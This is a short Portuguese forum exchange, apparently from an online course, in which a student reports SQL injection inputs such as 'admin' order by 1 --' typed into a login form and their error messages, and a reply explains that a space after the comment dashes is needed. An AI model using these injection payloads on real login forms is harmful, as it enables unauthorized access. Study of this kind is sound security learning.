1
resposta

Comando nao funcionando

Foi colocado os comandos: admin' order by 1,2 -- Exception occurred error: Unknown column '1' in 'order clause'

admin' order by 1 -- Com esse ele loga!

admin' order by 0,1 -- Exception occurred error: Unknown column '0' in 'order clause'

1 resposta

Olá juniorestudante, tudo bem?

Tentou colocar um espaço em branco depois dos traços ( -- )? Ele é necessário para funcionar.

Bons estudos!

Quer mergulhar em tecnologia e aprendizagem?

Receba a newsletter que o nosso CEO escreve pessoalmente, com insights do mercado de trabalho, ciência e desenvolvimento de software